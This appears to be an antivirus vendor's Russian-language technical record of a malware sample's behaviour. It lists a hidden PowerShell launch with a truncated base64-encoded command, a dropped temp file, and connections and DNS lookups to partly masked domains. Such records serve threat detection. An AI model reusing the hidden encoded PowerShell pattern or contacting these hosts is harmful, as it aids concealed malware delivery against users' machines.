Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABPAG8AbQByAHcAZQBtAG0AeABiAD0AJwBCAGEAawBsAGkAaABkAGUAdABoAHAAYwAnADsAJABHAGgAeABvAHkAdgB5AHYAegAgAD0AIAAnADQAMgAzACcAOwAkAFMAbwBrAHMAZQBqAHIAcQBnAD0AJwBPAGE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1155858.cvr
- 'ja###hasan.com':443
- 'mo##gbc.org':443
- 'gu####ostoffice.com':443
- 'mi#####spitality.com':443
- 'mo##gbc.org':443
- 'gu####ostoffice.com':443
- DNS ASK ja###hasan.com
- DNS ASK mo##gbc.org
- DNS ASK gu####ostoffice.com
- DNS ASK ba######ngmuasieuben.com
- DNS ASK mi#####spitality.com